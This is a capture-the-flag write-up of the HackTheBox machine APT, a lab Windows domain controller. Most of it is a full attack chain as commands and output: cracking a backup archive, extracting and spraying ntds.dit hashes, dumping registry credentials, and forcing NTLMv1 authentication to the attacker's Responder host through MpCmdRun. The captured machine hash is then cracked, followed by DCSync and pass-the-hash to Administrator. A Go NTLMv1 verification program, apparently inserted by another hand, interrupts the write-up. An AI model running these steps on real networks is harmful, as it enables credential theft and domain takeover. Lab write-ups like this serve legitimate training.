jebidiah-anthony

write-ups and what not

HTB APT (10.10.10.213)



PART 1 : INITIAL RECON

1.1 NMAP scan

$ nmap --min-rate 3000 -oN nmap-tcp.initial -p- -Pn -T4 -v 10.10.10.213

  Host is up.
  All 65535 scanned ports on 10.10.10.213 are filtered

  Read data files from: /usr/bin/../share/nmap
  Nmap done: 1 IP address (1 host up) scanned in 65.54 seconds

No open port was found, but scanning over IPv6 might yield a different result. First the machine's IPv6 address needs to be determined, which can be done with IOXIDResolver:

$ git clone https://github.com/mubix/IOXIDResolver.git

$ python3 IOXIDResolver/IOXIDResolver.py -t 10.10.10.213

  [*] Retrieving network interface of 10.10.10.213
  Address: apt
  Address: 10.10.10.213
  Address: dead:beef::b885:d62a:d679:573f
  Address: dead:beef::cda5:800b:148e:6594

Adding one of the recovered IPv6 addresses to /etc/hosts, then scanning again using the new hostname:

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f	apt.htb
$ nmap -6 --min-rate 3000 -oN nmap6-tcp.initial -p- -Pn -T4 -v apt.htb

  PORT      STATE SERVICE
  53/tcp    open  domain
  80/tcp    open  http
  135/tcp   open  msrpc
  389/tcp   open  ldap
  445/tcp   open  microsoft-ds
  464/tcp   open  kpasswd5
  593/tcp   open  http-rpc-epmap
  636/tcp   open  ldapssl
  5985/tcp  open  wsman
  9389/tcp  open  adws
  47001/tcp open  winrm

$ nmap -6 -oN nmap6-tcp -p 53,80,135,389,445,464,593,636,5985,9389,47001 -sC -sV -v apt.htb

  PORT      STATE SERVICE      VERSION
  53/tcp    open  domain       Simple DNS Plus
  80/tcp    open  http         Microsoft IIS httpd 10.0
  | http-methods:
  |   Supported Methods: OPTIONS TRACE GET HEAD POST
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/10.0
  |_http-title: Gigantic Hosting | Home
  135/tcp   open  msrpc        Microsoft Windows RPC
  389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  | ssl-cert: Subject: commonName=apt.htb.local
  | Subject Alternative Name: DNS:apt.htb.local
  | Issuer: commonName=apt.htb.local
  | Public Key type: rsa
  | Public Key bits: 2048
  | Signature Algorithm: sha256WithRSAEncryption
  | Not valid before: 2020-09-24T07:07:18
  | Not valid after:  2050-09-24T07:17:18
  | MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
  |_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
  |_ssl-date: 2021-04-09T11:25:05+00:00; 0s from scanner time.
  445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
  464/tcp   open  kpasswd5?
  593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  | ssl-cert: Subject: commonName=apt.htb.local
  | Subject Alternative Name: DNS:apt.htb.local
  | Issuer: commonName=apt.htb.local
  | Public Key type: rsa
  | Public Key bits: 2048
  | Signature Algorithm: sha256WithRSAEncryption
  | Not valid before: 2020-09-24T07:07:18
  | Not valid after:  2050-09-24T07:17:18
  | MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
  |_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
  |_ssl-date: 2021-04-09T11:25:05+00:00; 0s from scanner time.
  5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  9389/tcp  open  mc-nmf       .NET Message Framing
  47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: mean: -11m59s, deviation: 26m49s, median: 0s
  | smb-os-discovery:
  |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
  |   Computer name: apt
  |   NetBIOS computer name: APT\x00
  |   Domain name: htb.local
  |   Forest name: htb.local
  |   FQDN: apt.htb.local
  |   System time: 2021-04-09T12:24:49+01:00
  | smb-security-mode:
  |   account_used: <blank>
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: required
  | smb2-security-mode:
  |   2.02:
  |_    Message signing enabled and required
  | smb2-time:
  |   date: 2021-04-09T11:24:51
  |_  start_date: 2021-04-09T07:46:49

The open ports are now known, and the LDAP, Kerberos password-change (kpasswd) and SMB results show that the machine is part of an Active Directory domain, htb.local.

1.2 Updating /etc/hosts

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f	apt.htb.local HTB.local apt.htb

These hostname entries are needed when enumerating or connecting to the machine by name (the Kerberos steps later require the FQDN and domain name).


PART 2 : PORT ENUMERATION

TCP PORT 80 : HTTP

GiganticHosting

TCP PORT 445 : SMB

Enumerating available shares from anonymous login:

$ smbclient -L \\\\apt.htb -N

  Anonymous login successful

          Sharename       Type      Comment
          ---------       ----      -------
          backup          Disk
          IPC$            IPC       Remote IPC
          NETLOGON        Disk      Logon server share
          SYSVOL          Disk      Logon server share
  apt.htb is an IPv6 address -- no workgroup available

$ smbclient \\\\apt.htb\\backup -N

  smb: \> dir
    .                                   D        0  Thu Sep 24 03:30:52 2020
    ..                                  D        0  Thu Sep 24 03:30:52 2020
    backup.zip                          A 10650961  Thu Sep 24 03:30:32 2020

There is a backup.zip file publicly available in the backup share.

$ smbget -a -R smb://apt.htb/backup/backup.zip

  Using workgroup WORKGROUP, guest user
  smb://apt.htb/backup/backup.zip
  Downloaded 10.16MB in 37 seconds

$ unzip backup.zip

  Archive:  backup.zip
     creating: Active Directory/
  [backup.zip] Active Directory/ntds.dit password:

$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip

  PASSWORD FOUND!!!!: pw == iloveyousomuch

The backup.zip file was downloaded from the share, but extracting its contents requires a password. The password was weak enough to be recovered with a wordlist attack (rockyou.txt): iloveyousomuch. Extracting the archive with it reveals the following files:

$ unzip backup.zip

  Archive:  backup.zip
  [backup.zip] Active Directory/ntds.dit password: iloveyousomuch
    inflating: Active Directory/ntds.dit
    inflating: Active Directory/ntds.jfm
     creating: registry/
    inflating: registry/SECURITY
    inflating: registry/SYSTEM

$ find . -type f -exec file {} + 2>/dev/null | grep -v backup

  ./Active Directory/ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x6f146ad6, page size 8192, Windows version 10.0
  ./Active Directory/ntds.jfm: data
  ./registry/SECURITY:         MS Windows registry file, NT/2000 or above
  ./registry/SYSTEM:           MS Windows registry file, NT/2000 or above

There is an ntds.dit file, the Active Directory database, which stores directory data including user objects and their password hashes; the hashes inside it are stored encrypted. Alongside it are the SYSTEM and SECURITY Windows registry hives.


PART 3 : EXPLOITATION

3.1 Search for valid users

$ impacket-secretsdump -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -outputfile user_hashes.txt LOCAL

$ ls -l

  -rwxrwxrwx 1 root root   176132 xxx  x xx:xx  user_hashes.txt.ntds
  -rwxrwxrwx 1 root root      136 xxx  x xx:xx  user_hashes.txt.ntds.cleartext
  -rwxrwxrwx 1 root root   433995 xxx  x xx:xx  user_hashes.txt.ntds.kerberos

The extraction works because the password encryption key that protects the hashes in ntds.dit is itself encrypted with the boot key, which is stored in the SYSTEM registry hive. If the SYSTEM hive is not available, the boot key can instead be passed directly to impacket's secretsdump with its -bootkey argument.

$ cat user_hashes.txt.ntds | head -n 1

  Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

$ cat user_hashes.txt.ntds | head -n 1 | cut -d':' -f1

  Administrator

$ cat user_hashes.txt.ntds | cut -d':' -f1 > ../usernames.txt

$ ./kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb.local -o kerbrute.txt -v usernames.txt
      __             __               __
     / /_____  _____/ /_  _______  __/ /____
    / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
   / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
  /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

  Version: v1.0.3 (9dad6e1) - xx/xx/xx - Ronnie Flathers @ropnop

  xxxx/xx/xx xx:xx:xx >  Using KDC(s):
  xxxx/xx/xx xx:xx:xx >  	apt.htb.local:88
  [...omitted...]

$ cat kerbrute.txt | grep VALID

  xxxx/xx/xx xx:xx:xx >  [+] VALID USERNAME:	 [email protected]
  xxxx/xx/xx xx:xx:xx >  [+] VALID USERNAME:	 [email protected]
  xxxx/xx/xx xx:xx:xx >  [+] VALID USERNAME:	 [email protected]

The usernames were cut from the password-hash lines that impacket-secretsdump recovered from ntds.dit, then passed through kerbrute to check whether they are still valid accounts on the domain controller. Three were: Administrator, APT$, and henry.vinson.

3.2 Generating a Kerberos Ticket for henry.vinson

The hashes found for the valid users do not work when attempting to log in via WinRM. Since the box is part of an Active Directory domain, maybe obtaining a Kerberos ticket will work for authenticating to the machine.

$ cat user_hashes.txt.ntds | grep henry.vinson

  henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::

$ cat user_hashes.txt.ntds | grep henry.vinson | awk -F':' '{printf "%s:%s\n",$3,$4}'

  aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f

$ cat user_hashes.txt.ntds | awk -F':' '{printf "%s:%s\n",$3,$4}' | sort | uniq > ../hashes.txt

$ for i in $(cat hashes.txt); do echo $i; attempt=$(impacket-getTGT HTB.local/[email protected] -hashes $i); if ! [[ $attempt == "SessionError" ]]; then echo "HASH FOUND: [$i]"; echo $attempt; break; fi; done

  [...omitted...]
  HASH FOUND: [aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb]
  Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

  [*] Saving ticket in [email protected]

$ klist -c [email protected]

  Ticket cache: FILE:[email protected]
  Default principal: [email protected]

  Valid starting       Expires              Service principal
  xx/xx/xxxx xx:xx:xx  xx/xx/xxxx xx:xx:xx  krbtgt/[email protected]
  	  renew until xx/xx/xxxx xx:xx:xx

Expanded form of the one-liner used above (any run whose output does not contain the tool's SessionError message is treated as a hit):

while read -r i; do
    echo "$i"
    # capture both output streams so the check below sees the error line wherever impacket prints it
    attempt=$(impacket-getTGT HTB.local/[email protected] -hashes "$i" 2>&1)

    if [[ $attempt != *SessionError* ]]; then
        echo "HASH FOUND: [$i]"
        echo "$attempt"
        break
    fi
done < hashes.txt

A password spray was attempted against the user henry.vinson, using the hashes extracted from ntds.dit in place of passwords, and one of the hashes (not the one recorded for his own account) obtained a TGT (krbtgt ticket) for him, so his current password is one that another account in the backup used. However, the ticket still does not authenticate via WinRM.

3.3 Dumping HKEY_USERS

The HKU (HKEY_USERS) registry hive holds the per-user configuration of every loaded user profile.

$ export KRB5CCNAME=[email protected]

$ env | grep KRB5

  KRB5CCNAME=[email protected]

$ impacket-reg -k apt.htb.local query -keyName HKU -s > registry.txt

Since a ticket for henry.vinson is already cached, impacket-reg authenticates with it (-k) and recursively (-s) dumps the HKU hive, which includes his loaded user profile.

$ cat registry.txt | grep -i -A5 -B5 -E 'henry'

  [...omitted...]
  \Software\GiganticHostingManagementSystem\
	        UserName	REG_SZ	 henry.vinson_adm
	        PassWord	REG_SZ	 G1#[email protected]
  [...omitted...]

Within the extracted data are the stored credentials of the deployed service, GiganticHostingManagementSystem, kept as plaintext REG_SZ values.


PART 4 : GENERATING A USER SHELL (henry.vinson_adm)

$ evil-winrm -i apt.htb -u henry.vinson_adm -p 'G1#[email protected]' --no-colors

PS C:\Users\henry.vinson_adm\Documents> whoami

  htb\henry.vinson_adm

PS C:\Users\henry.vinson_adm\Documents> ipconfig

  Windows IP Configuration


  Ethernet adapter Ethernet:

     Connection-specific DNS Suffix  . :
     IPv6 Address. . . . . . . . . . . : dead:beef::3d05:a1a8:4a51:c2fe
     IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
     Link-local IPv6 Address . . . . . : fe80::3d05:a1a8:4a51:c2fe%5
     IPv4 Address. . . . . . . . . . . : 10.10.10.213
     Subnet Mask . . . . . . . . . . . : 255.255.255.0
     Default Gateway . . . . . . . . . : dead:beef::1
                                         fe80::250:56ff:feb9:75a0%5
                                         10.10.10.2

PS C:\Users\henry.vinson_adm\Documents> dir ..\Desktop

      Directory: C:\Users\henry.vinson_adm\Desktop


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -ar---       xx/xx/xxxx  xx:xx XX             34 user.txt

It seems the other users cannot authenticate via WinRM even with a valid hash because they are not members of the Remote Management Users group:

PS C:\Users\henry.vinson_adm\Documents> net localgroup "Remote Management Users"

  Alias name     Remote Management Users
  Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

  Members

  -------------------------------------------------------------------------------
  henry.vinson_adm

PART 5 : PRIVILEGE ESCALATION (henry.vinson_adm → Administrator)

5.1 The console history of henry.vinson_adm

Checking the console history of the current user:

PS C:\Users\henry.vinson_adm\Documents> cd ..\AppData

PS C:\Users\henry.vinson_adm\AppData> type Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

The lmcompatibilitylevel DWORD was set to 2, which the Microsoft documentation for the LAN Manager authentication level setting describes as follows:

DWORD   Setting                    Description
2       Send NTLM response only    Client devices use NTLMv1 authentication, and they use NTLMv2 session security if the server supports it. Domain controllers accept LM, NTLM, and NTLMv2 authentication.

With this setting the machine answers authentication challenges with NTLMv1 responses, using NTLMv2 session security only when the server offers it.

5.2 Intercepting NTLMv1 Hashes

Setting up Responder with a fixed challenge, "1122334455667788" (a known challenge is what allows the captured NTLMv1 response to be looked up in precomputed tables later), and with --lm so that the listener refuses NTLMv2 session security:

$ cat /etc/responder/Responder.conf | grep -i challenge

  ; Custom challenge.
  ; Use "Random" for generating a random challenge for each requests (Default)
  Challenge = 1122334455667788

$ sudo responder -I tun0 --lm

                                           __
    .----.-----.-----.-----.-----.-----.--|  |.-----.----.
    |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
    |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                     |__|

             NBT-NS, LLMNR & MDNS Responder 3.0.2.0

    Author: Laurent Gaffie ([email protected])
    To kill this script hit CTRL-C

    [...omitted...]
    [+] Servers:
        [...omitted...]
        SMB server                 [ON]
    [...omitted...]

    [+] Poisoning Options:
        [...omitted...]
        Force LM downgrade         [ON]
    [...omitted...]

    [+] Generic Options:
        Responder NIC              [tun0]
        Responder IP               [10.10.14.11]
        Challenge set              [1122334455667788]
    [...omitted...]

Then triggering an SMB connection from the target to the listener, so that the machine authenticates to it with NTLM:

PS C:\Users\henry.vinson_adm\AppData> cd "C:\ProgramData\Microsoft\Windows Defender\platform"

PS C:\ProgramData\Microsoft\Windows Defender\platform> dir


      Directory: C:\ProgramData\Microsoft\Windows Defender\platform


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  d-----       11/10/2020  11:09 AM                4.18.2010.7-0
  d-----        3/17/2021   3:13 PM                4.18.2102.4-0

PS C:\ProgramData\Microsoft\Windows Defender\platform> cd 4.18.2010.7-0

PS C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0> .\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.11\file.txt

Back in the running Responder, the NTLMv1 response of the computer account was captured (the scan itself is performed by the Defender service, so the outbound connection authenticates as the machine account, APT$):

[SMB] NTLMv1 Client   : 10.10.10.213
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
[...omitted...]
PS C:\Users\henry.vinson_adm\Documents> Get-ADComputer "APT"

  DistinguishedName : CN=APT,OU=Domain Controllers,DC=htb,DC=local
  DNSHostName       : apt.htb.local
  Enabled           : True
  Name              : APT
  ObjectClass       : computer
  ObjectGUID        : a78acf4d-42b5-49bc-9855-2389a80e726d
  SamAccountName    : APT$
  SID               : S-1-5-21-2993095098-2100462451-206186470-1001
  UserPrincipalName :

Submitting the response to crack.sh as NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384 returns the following once the lookup succeeds; the Key is the NT hash of the APT$ machine account:

Token: $NETNTLM$1122334455667788$95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
Key: d167c3238864b12f5f82feae86a7f798
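Before acting on a key returned by crack.sh, an analyst would confirm that it actually reproduces the captured response. The Go program below is an added example (not part of the write-up, Responder or crack.sh) that parses the Responder capture line shown above, builds the crack.sh token from it, and recomputes the NTLMv1 response from an NT hash with the standard library's DES so the returned Key can be checked. The capture line and key are the ones shown above; the function names are mine.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Responder's "[SMB] NTLMv1 Hash" line (user::domain:lm_response:nt_response:server_challenge)
// and the key crack.sh returned for it, both taken from the write-up.
const (
	sampleCapture = "APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788"
	sampleKey     = "d167c3238864b12f5f82feae86a7f798"
)

// NTLMv1Capture holds the fields of one Responder capture line.
type NTLMv1Capture struct {
	User, Domain, LMResp, NTResp, Challenge string
}

// ParseCapture splits the line and rejects NTLMv1 with Extended Session Security
// (ESS): without ESS the LM and NT response fields are identical, and only that
// plain form is what a fixed-challenge lookup covers.
func ParseCapture(line string) (NTLMv1Capture, error) {
	f := strings.Split(strings.TrimSpace(line), ":")
	if len(f) != 6 {
		return NTLMv1Capture{}, fmt.Errorf("want 6 colon-separated fields, got %d", len(f))
	}
	c := NTLMv1Capture{User: f[0], Domain: f[2], LMResp: f[3], NTResp: f[4], Challenge: f[5]}
	if len(c.NTResp) != 48 || len(c.Challenge) != 16 {
		return NTLMv1Capture{}, errors.New("response must be 24 bytes and challenge 8 bytes of hex")
	}
	if !strings.EqualFold(c.LMResp, c.NTResp) {
		return NTLMv1Capture{}, errors.New("LM and NT responses differ: ESS was negotiated, not plain NTLMv1")
	}
	return c, nil
}

// Token formats the capture the way crack.sh expects it.
func (c NTLMv1Capture) Token() string {
	return "$NETNTLM$" + c.Challenge + "$" + c.NTResp
}

// desKey spreads 7 key bytes over the 8-byte DES key form (7 key bits per byte);
// the low parity bit of each byte is ignored by DES and is left as it falls.
func desKey(k7 []byte) []byte {
	return []byte{
		k7[0],
		k7[0]<<7 | k7[1]>>1,
		k7[1]<<6 | k7[2]>>2,
		k7[2]<<5 | k7[3]>>3,
		k7[3]<<4 | k7[4]>>4,
		k7[4]<<3 | k7[5]>>5,
		k7[5]<<2 | k7[6]>>6,
		k7[6] << 1,
	}
}

// NTLMv1Response recomputes the 24-byte response: the 16-byte NT hash is zero-padded
// to 21 bytes, split into three 7-byte DES keys, and each key encrypts the 8-byte
// server challenge. The third key holds only two bytes of the hash, the rest being
// padding, which is why a known challenge makes the hash recoverable from one capture.
func NTLMv1Response(ntHash, challenge []byte) ([]byte, error) {
	if len(ntHash) != 16 || len(challenge) != 8 {
		return nil, errors.New("need a 16-byte NT hash and an 8-byte challenge")
	}
	padded := make([]byte, 21)
	copy(padded, ntHash)
	out := make([]byte, 0, 24)
	for i := 0; i < 21; i += 7 {
		block, err := des.NewCipher(desKey(padded[i : i+7]))
		if err != nil {
			return nil, err
		}
		enc := make([]byte, 8)
		block.Encrypt(enc, challenge)
		out = append(out, enc...)
	}
	return out, nil
}

// VerifyRecoveredKey reports whether a key returned by the lookup reproduces the captured response.
func VerifyRecoveredKey(c NTLMv1Capture, keyHex string) (bool, error) {
	key, err1 := hex.DecodeString(keyHex)
	chal, err2 := hex.DecodeString(c.Challenge)
	if err1 != nil || err2 != nil {
		return false, errors.New("key and challenge must be hex strings")
	}
	resp, err := NTLMv1Response(key, chal)
	if err != nil {
		return false, err
	}
	return strings.EqualFold(hex.EncodeToString(resp), c.NTResp), nil
}

func main() {
	c, err := ParseCapture(sampleCapture)
	if err != nil {
		panic(err)
	}
	ok, err := VerifyRecoveredKey(c, sampleKey)
	fmt.Println("token:", c.Token(), "| key reproduces capture:", ok, err)
}
```

The 21-byte split is the whole weakness: three independent single-DES operations over a challenge the listener chose, so the capture is reversible regardless of password strength. The downgrade to level 2 found in the console history is what made it possible; level 5 ("Send NTLMv2 response only. Refuse LM & NTLM") prevents the client from producing an NTLMv1 response at all.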

5.3 Running impacket-secretsdump to obtain password hashes

$ impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798 'HTB.local/[email protected]'

  Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

  [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
  [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
  [*] Using the DRSUAPI method to get NTDS.DIT secrets
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
  DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
  henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
  APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
  [*] Kerberos keys grabbed
  Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
  Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
  Administrator:des-cbc-md5:0816d9d052239b8a
  krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
  krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
  krbtgt:des-cbc-md5:f8c26238c2d976bf
  henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
  henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
  henry.vinson:des-cbc-md5:73b6f71cae264fad
  henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
  henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
  henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
  APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
  APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
  APT$:des-cbc-md5:76c45245f104a4bf
  [*] Cleaning up...

5.4 Shell as Administrator

$ evil-winrm -i apt.htb -u Administrator -H c370bddf384a691d811ff3495e8a72e2 --no-colors

PS C:\Users\Administrator\Documents> whoami

  htb\administrator

PS C:\Users\Administrator\Documents> dir ..\Desktop


      Directory: C:\Users\Administrator\Desktop


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -ar---       xx/xx/xxxx  xx:xx XX             34 root.txt


PS C:\Users\Administrator\Documents> ipconfig

  Windows IP Configuration


  Ethernet adapter Ethernet:

     Connection-specific DNS Suffix  . :
     IPv6 Address. . . . . . . . . . . : dead:beef::3d05:a1a8:4a51:c2fe
     IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
     Link-local IPv6 Address . . . . . : fe80::3d05:a1a8:4a51:c2fe%5
     IPv4 Address. . . . . . . . . . . : 10.10.10.213
     Subnet Mask . . . . . . . . . . . : 255.255.255.0
     Default Gateway . . . . . . . . . : dead:beef::1
                                         fe80::250:56ff:feb9:75a0%5
                                         10.10.10.2